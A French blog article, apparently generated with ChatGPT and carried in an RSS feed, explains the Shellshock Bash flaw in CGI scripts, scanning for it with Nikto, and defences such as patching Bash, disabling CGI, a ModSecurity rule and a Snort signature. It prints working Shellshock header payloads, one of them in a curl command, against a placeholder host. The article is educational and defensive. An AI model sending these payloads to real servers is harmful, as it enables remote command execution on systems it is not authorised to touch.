<div class="min-h-8 text-message relative flex w-full flex-col items-end gap-2 text-start break-words whitespace-normal [.text-message+&amp;]:mt-5" dir="auto" data-message-author-role="assistant" data-message-id="b7431e4c-af74-430e-b465-1baca7c1f6e9" data-message-model-slug="gpt-4o">
<div class="flex w-full flex-col gap-1 empty:hidden first:pt-[3px]">
<div class="markdown prose dark:prose-invert w-full break-words light">
<h2 data-end="363" data-start="314">Introduction : pourquoi analyser les failles ?</h2>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</article>
<article class="text-token-text-primary w-full" dir="auto" data-scroll-anchor="false" data-testid="conversation-turn-12">
<div class="text-base my-auto mx-auto py-5 [--thread-content-margin:--spacing(4)] @[37rem]:[--thread-content-margin:--spacing(6)] @[72rem]:[--thread-content-margin:--spacing(16)] px-(--thread-content-margin)">
<div class="[--thread-content-max-width:32rem] @[34rem]:[--thread-content-max-width:40rem] @[64rem]:[--thread-content-max-width:48rem] mx-auto flex max-w-(--thread-content-max-width) flex-1 text-base gap-4 md:gap-5 lg:gap-6 group/turn-messages focus-visible:outline-hidden" tabindex="-1">
<div class="group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn">
<div class="relative flex-col gap-1 md:gap-3">
<div class="flex max-w-full flex-col grow">
<div class="min-h-8 text-message relative flex w-full flex-col items-end gap-2 text-start break-words whitespace-normal [.text-message+&amp;]:mt-5" dir="auto" data-message-author-role="assistant" data-message-id="43b90c3f-5a77-4706-ab16-27942576ca59" data-message-model-slug="gpt-4o">
<div class="flex w-full flex-col gap-1 empty:hidden first:pt-[3px]">
<div class="markdown prose dark:prose-invert w-full break-words light">
<p data-end="662" data-start="397">Dans le monde de la cybersécurité, l’analyse de faille est un processus indispensable. Elle permet d’identifier et corriger les vulnérabilités avant qu’elles ne soient exploitées. Un attaquant n’a besoin que d’un seul point faible : à nous de le détecter avant lui.</p>
<p data-end="1076" data-start="664">Dans cet article, nous allons nous intéresser à une faille emblématique : <strong data-end="752" data-start="738">Shellshock</strong> (CVE-2014-6271), qui a touché <strong data-end="791" data-start="783">Bash</strong> en 2014. Nous verrons comment utiliser <strong data-end="840" data-start="831">Nikto</strong>, un scanner de vulnérabilités web, pour la détecter, comment l’exploiter manuellement, et surtout comment s’en prémunir. Pour cela, il est essentiel de comprendre le rôle joué par <strong data-end="1055" data-start="1021">CGI (Common Gateway Interface)</strong> dans l’exploitation.</p>
<h2 data-end="1126" data-start="1083">🧠 CGI : le chaînon faible de Shellshock</h2>
<h3 data-end="1151" data-start="1128">Qu’est-ce que CGI ?</h3>
<p data-end="1478" data-start="1153">CGI (Common Gateway Interface) est une spécification permettant à un serveur web d’exécuter des <strong data-end="1272" data-start="1249">programmes externes</strong> – appelés scripts CGI – pour générer dynamiquement des réponses HTTP. Ces scripts peuvent être écrits en <strong data-end="1406" data-start="1378">Bash, Perl, Python, etc.</strong>, et sont souvent utilisés dans des environnements anciens ou embarqués.</p>
<h3 data-end="1506" data-start="1480">Fonctionnement général</h3>
<p data-end="1565" data-start="1508">Lorsqu’un utilisateur accède à un script CGI via le web :</p>
<ol data-end="1886" data-start="1567">
<li data-end="1640" data-start="1567">
<p data-end="1640" data-start="1570">Le serveur (ex. Apache) exécute le script comme <strong data-end="1639" data-start="1618">processus système</strong>.</p>
</li>
<li data-end="1756" data-start="1641">
<p data-end="1756" data-start="1644">Il lui transmet les en-têtes HTTP sous forme de <strong data-end="1721" data-start="1692">variables d’environnement</strong> (ex : <code data-end="1740" data-start="1728">User-Agent</code>, <code data-end="1748" data-start="1742">Host</code>, etc.).</p>
</li>
<li data-end="1810" data-start="1757">
<p data-end="1810" data-start="1760">Le <strong data-end="1786" data-start="1763">corps de la requête</strong> est envoyé via <code data-end="1809" data-start="1802">stdin</code>.</p>
</li>
<li data-end="1886" data-start="1811">
<p data-end="1886" data-start="1814">Le <strong data-end="1852" data-start="1817">résultat du script est retourné</strong> au client comme une réponse HTTP.</p>
</li>
</ol>
<p data-end="2002" data-start="1888">C’est précisément le passage des <strong data-end="1950" data-start="1921">variables d’environnement</strong> qui rend Shellshock si dangereuse dans ce contexte.</p>
<h2 data-end="2052" data-start="2009">📜 Exemple de script CGI Bash vulnérable</h2>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash"><span class="hljs-meta">#!/bin/bash</span><br />
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Content-type: text/plain"</span><br />
<span class="hljs-built_in">echo</span><br />
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello, world!"</span><br />
</code></div>
</div>
<h4 data-end="2164" data-start="2137">Décryptage du script :</h4>
<ul data-end="2452" data-start="2166">
<li data-end="2231" data-start="2166">
<p data-end="2231" data-start="2168"><code data-end="2181" data-start="2168">#!/bin/bash</code> : indique que le script sera interprété par Bash.</p>
</li>
<li data-end="2310" data-start="2232">
<p data-end="2310" data-start="2234"><code data-end="2267" data-start="2234">echo "Content-type: text/plain"</code> : définit le type MIME de la réponse HTTP.</p>
</li>
<li data-end="2373" data-start="2311">
<p data-end="2373" data-start="2313"><code data-end="2319" data-start="2313">echo</code> : une ligne vide obligatoire après les en-têtes HTTP.</p>
</li>
<li data-end="2452" data-start="2374">
<p data-end="2452" data-start="2376"><code data-end="2398" data-start="2376">echo "Hello, world!"</code> : le corps de la réponse, affiché dans le navigateur.</p>
</li>
</ul>
<p data-end="2559" data-start="2454">Ce script peut être appelé par un navigateur à l’adresse :<br data-end="2515" data-start="2512" /><code data-end="2559" data-start="2515">http://vulnerable-site.com/cgi-bin/test.sh</code></p>
<h2 data-end="2610" data-start="2566">🐚 Shellshock (CVE-2014-6271) : la faille</h2>
<p data-end="2822" data-start="2612">La vulnérabilité Shellshock réside dans le fait que <strong data-end="2688" data-start="2664">Bash exécute du code</strong>contenu dans les définitions de fonctions transmises via des variables d’environnement. C’est un comportement inattendu et dangereux.</p>
<p data-end="2853" data-start="2824">Une requête HTTP malicieuse :</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">http</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-http">GET /cgi-bin/test.sh HTTP/1.1<br />
Host: vulnerable-site.com<br />
User-Agent: () { :; }; echo; /bin/bash -c 'echo shellshock exploited'<br />
</code></div>
</div>
<p data-end="3108" data-start="2994">entraînera l’exécution de la commande <code data-end="3061" data-start="3032">"echo shellshock exploited"</code> sur le serveur, sans vérification ni contrôle.</p>
<h2 data-end="3141" data-start="3115">🔎 Détection avec Nikto</h2>
<p data-end="3371" data-start="3143">Nikto est un scanner open source de vulnérabilités web. Il teste des milliers de failles connues sur des serveurs HTTP. L’une de ses forces est sa capacité à <strong data-end="3357" data-start="3301">détecter automatiquement des scripts CGI vulnérables</strong> à Shellshock.</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash">nikto -h http://vulnerable-site.com/cgi-bin/ -Tuning x<br />
</code></div>
</div>
<h3 data-end="3482" data-start="3441">Explication des options principales :</h3>
<ul data-end="3755" data-start="3484">
<li data-end="3510" data-start="3484">
<p data-end="3510" data-start="3486"><code data-end="3490" data-start="3486">-h</code> : hôte ou URL cible</p>
</li>
<li data-end="3584" data-start="3511">
<p data-end="3584" data-start="3513"><code data-end="3524" data-start="3513">-Tuning x</code> : active <strong data-end="3561" data-start="3534">tous les types de tests</strong> (CGI, injection, XSS…)</p>
</li>
<li data-end="3632" data-start="3585">
<p data-end="3632" data-start="3587"><code data-end="3608" data-start="3587">-output fichier.txt</code> : exporte les résultats</p>
</li>
<li data-end="3694" data-start="3633">
<p data-end="3694" data-start="3635"><code data-end="3645" data-start="3635">-evasion</code> : tente de contourner des filtres ou WAF simples</p>
</li>
<li data-end="3755" data-start="3695">
<p data-end="3755" data-start="3697"><code data-end="3709" data-start="3697">-Display V</code> : n’affiche que les vulnérabilités confirmées</p>
</li>
</ul>
<h2 data-end="3803" data-start="3762">🧪 Exploitation manuelle de Shellshock</h2>
<p data-end="3864" data-start="3805">Un simple test <code data-end="3826" data-start="3820">curl</code> peut suffire à démontrer une faille :</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash">curl -H <span class="hljs-string">'User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo HACKED'</span> http://vulnerable-site.com/cgi-bin/test.sh<br />
</code></div>
</div>
<h2 data-end="4047" data-start="4009">⚙️ Fonctionnement des variables CGI</h2>
<p data-end="4145" data-start="4049">Les scripts CGI récupèrent les données HTTP via des <strong data-end="4130" data-start="4101">variables d’environnement</strong>, par exemple :</p>
<ul data-end="4251" data-start="4147">
<li data-end="4178" data-start="4147">
<p data-end="4178" data-start="4149"><code data-end="4165" data-start="4149">REQUEST_METHOD</code> (GET, POST…)</p>
</li>
<li data-end="4219" data-start="4179">
<p data-end="4219" data-start="4181"><code data-end="4198" data-start="4181">HTTP_USER_AGENT</code>, <code data-end="4213" data-start="4200">HTTP_COOKIE</code>, etc.</p>
</li>
<li data-end="4251" data-start="4220">
<p data-end="4251" data-start="4222"><code data-end="4235" data-start="4222">REMOTE_ADDR</code>, <code data-end="4250" data-start="4237">SERVER_NAME</code>…</p>
</li>
</ul>
<p data-end="4383" data-start="4253">Shellshock tire parti de ce mécanisme pour <strong data-end="4345" data-start="4296">injecter des fonctions Bash contenant du code</strong> dans des en-têtes comme <code data-end="4382" data-start="4370">User-Agent</code>.</p>
<hr data-end="4388" data-start="4385" />
<h2 data-end="4432" data-start="4390">🔐 Contre-mesures : comment se protéger</h2>
<h3 data-end="4461" data-start="4434">✅ 1. Mettre à jour Bash</h3>
<p data-end="4661" data-start="4463">La mise à jour de Bash corrige le comportement fondamental à l’origine de Shellshock : les versions vulnérables traitaient automatiquement certaines définitions de fonction comme du code à exécuter.</p>
<p data-end="4731" data-start="4663">Une version corrigée ignore ou désactive totalement ce comportement.</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash"><code class="whitespace-pre! language-bash"><span class="hljs-comment"># Debian/Ubuntu</span><br />
sudo apt update &amp;&amp; sudo apt install --only-upgrade bash</code></code><span class="hljs-comment"># CentOS/RHEL</span><br />
sudo yum update bash</div>
</div>
<p data-end="4994" data-start="4854"><strong data-end="4994" data-start="4854">⚠️ Sans cette mise à jour, aucune autre mesure ne suffit : même avec un WAF ou une surveillance, la faille peut toujours être exploitée.</strong></p>
<h3 data-end="5037" data-start="5001">✅ 2. Désactiver les CGI inutiles</h3>
<p data-end="5161" data-start="5039"><strong data-end="5147" data-start="5039">Définition : un script CGI est « inutile » dès lors qu’il ne sert plus à une fonctionnalité en production.</strong> Cela inclut :</p>
<ul data-end="5315" data-start="5162">
<li data-end="5206" data-start="5162">
<p data-end="5206" data-start="5164">Des scripts de test (<code data-end="5194" data-start="5185">test.sh</code>, <code data-end="5205" data-start="5196">env.cgi</code>)</p>
</li>
<li data-end="5253" data-start="5207">
<p data-end="5253" data-start="5209">Des scripts hérités de vieilles applications</p>
</li>
<li data-end="5315" data-start="5254">
<p data-end="5315" data-start="5256">Des démonstrations installées par défaut (souvent oubliées)</p>
</li>
</ul>
<p data-end="5447" data-start="5317">Ces scripts peuvent <strong data-end="5378" data-start="5337">rester accessibles sans être visibles</strong>, et sont très fréquemment ciblés automatiquement par les attaquants.</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash">sudo a2dismod cgi<br />
sudo systemctl restart apache2<br />
</code></div>
</div>
<h3 data-end="5577" data-start="5516">✅ 3. Filtrage HTTP avec un WAF (Web Application Firewall)</h3>
<p data-end="5867" data-start="5579">Un <strong data-end="5589" data-start="5582">WAF</strong> agit comme une barrière entre l’utilisateur et le serveur. Il inspecte chaque requête HTTP à la recherche de motifs suspects. Dans le cas de Shellshock, cela signifie bloquer les en-têtes qui contiennent des définitions de fonction suspectes dans des champs comme <code data-end="5866" data-start="5854">User-Agent</code>.</p>
<p data-end="5899" data-start="5869">Exemple de règle ModSecurity :</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">apache</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-apache">SecRule REQUEST_HEADERS:User-Agent "^\(\)\s*{.*;.*}" \<br />
"id:1000001,phase:1,t:lowercase,deny,status:403,msg:'Shellshock attack detected'"<br />
</code></div>
</div>
<ul data-end="6269" data-start="6057">
<li data-end="6164" data-start="6057">
<p data-end="6164" data-start="6059">Cette règle détecte les chaînes qui ressemblent à une déclaration de fonction Bash suivie d’une commande.</p>
</li>
<li data-end="6269" data-start="6165">
<p data-end="6269" data-start="6167">Elle agit avant que le script CGI ne soit exécuté, ce qui est <strong data-end="6240" data-start="6229">crucial</strong> en environnement vulnérable.</p>
</li>
</ul>
<p data-end="6385" data-start="6271">💡 <em data-end="6385" data-start="6274">Bien que les WAF ne soient pas infaillibles, ils sont efficaces contre des attaques automatiques ou basiques.</em></p>
<h3 data-end="6429" data-start="6392">✅ 4. Surveillance active avec IDS</h3>
<p data-end="6564" data-start="6431">Un <strong data-end="6470" data-start="6434">IDS (Intrusion Detection System)</strong> complète la défense en <strong data-end="6507" data-start="6494">détectant</strong> les tentatives suspectes et en <strong data-end="6563" data-start="6539">générant des alertes</strong>.</p>
<p data-end="6594" data-start="6566">Exemples d’IDS compatibles :</p>
<ul data-end="6786" data-start="6596">
<li data-end="6665" data-start="6596">
<p data-end="6665" data-start="6598"><strong data-end="6607" data-start="6598">OSSEC</strong> : centralisé, léger, facile à intégrer à des logs Apache.</p>
</li>
<li data-end="6732" data-start="6666">
<p data-end="6732" data-start="6668"><strong data-end="6677" data-start="6668">Snort</strong> : puissant, très utilisé, signatures personnalisables.</p>
</li>
<li data-end="6786" data-start="6733">
<p data-end="6786" data-start="6735"><strong data-end="6747" data-start="6735">Suricata</strong> : similaire à Snort mais multithreadé.</p>
</li>
</ul>
<p data-end="6825" data-start="6788">Exemple de règle Snort (simplifiée) :</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">css</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre!">alert tcp any any -&gt; any <span class="hljs-number">80</span> (msg:<span class="hljs-string">"Shellshock attempt"</span>; <span class="hljs-attribute">content</span>:<span class="hljs-string">"() { :; };"</span>; sid:<span class="hljs-number">1000002</span>; rev:<span class="hljs-number">1</span>;)<br />
</code></div>
</div>
<p data-end="7092" data-start="6934">Grâce à ces outils, même si une faille est présente, vous <strong data-end="7016" data-start="6992">saurez en temps réel</strong>qu’une attaque a été tentée, et pourrez réagir (blocage d’IP, audit, etc.).</p>
<h2 data-end="7148" data-start="7099">🔧 Déploiement local d’un script CGI pour test</h2>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash">sudo apt install apache2<br />
sudo a2enmod cgi<br />
sudo <span class="hljs-built_in">mkdir</span> -p /usr/lib/cgi-bin<br />
</code></div>
</div>
<p data-end="7272" data-start="7236">Fichier <code data-end="7270" data-start="7244">/usr/lib/cgi-bin/test.sh</code> :</p>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash"><span class="hljs-meta">#!/bin/bash</span><br />
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Content-type: text/plain"</span><br />
<span class="hljs-built_in">echo</span><br />
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello from CGI!"</span><br />
</code></div>
</div>
<div class="contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary">
<div class="flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between h-9 bg-token-sidebar-surface-primary select-none rounded-t-2xl">bash</div>
<div class="overflow-y-auto p-4" dir="ltr"><code class="whitespace-pre! language-bash"><span class="hljs-built_in">chmod</span> +x /usr/lib/cgi-bin/test.sh<br />
sudo systemctl restart apache2<br />
</code></div>
</div>
<p data-end="7515" data-start="7437">Accès :<br data-end="7447" data-start="7444" /><a class="" href="http://localhost/cgi-bin/test.sh" target="_new" rel="noopener" data-end="7515" data-start="7447">http://localhost/cgi-bin/test.sh</a></p>
<h2 data-end="7535" data-start="7522">Conclusion</h2>
<p data-end="7786" data-start="7537">Shellshock n’est pas une faille anecdotique. Elle a montré comment un simple en-tête HTTP peut suffire à prendre le contrôle d’un serveur mal configuré. Les <strong data-end="7709" data-start="7694">scripts CGI</strong>, souvent oubliés ou laissés en place par habitude, sont des portes ouvertes.</p>
<p data-end="7811" data-start="7788">Ce qu’il faut retenir :</p>
<ul data-end="8065" data-start="7812">
<li data-end="7866" data-start="7812">
<p data-end="7866" data-start="7814"><strong data-end="7823" data-start="7814">Nikto</strong> permet de détecter ces failles rapidement.</p>
</li>
<li data-end="7954" data-start="7867">
<p data-end="7954" data-start="7869">La <strong data-end="7895" data-start="7872">mise à jour de Bash</strong> est obligatoire : elle corrige le comportement vulnérable.</p>
</li>
<li data-end="8006" data-start="7955">
<p data-end="8006" data-start="7957">Les <strong data-end="8005" data-start="7961">CGI non utilisés doivent être désactivés</strong>.</p>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</article>
<p>L’article <a href="https://www.varden-security.eu/2025/06/24/analyse-de-faille-avec-nikto-exploitation-et-protection-contre-shellshock-via-cgi/">Analyse de faille avec Nikto : exploitation et protection contre Shellshock via CGI</a> est apparu en premier sur <a href="https://www.varden-security.eu">Varden Security</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.varden-security.eu/2025/06/24/analyse-de-faille-avec-nikto-exploitation-et-protection-contre-shellshock-via-cgi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
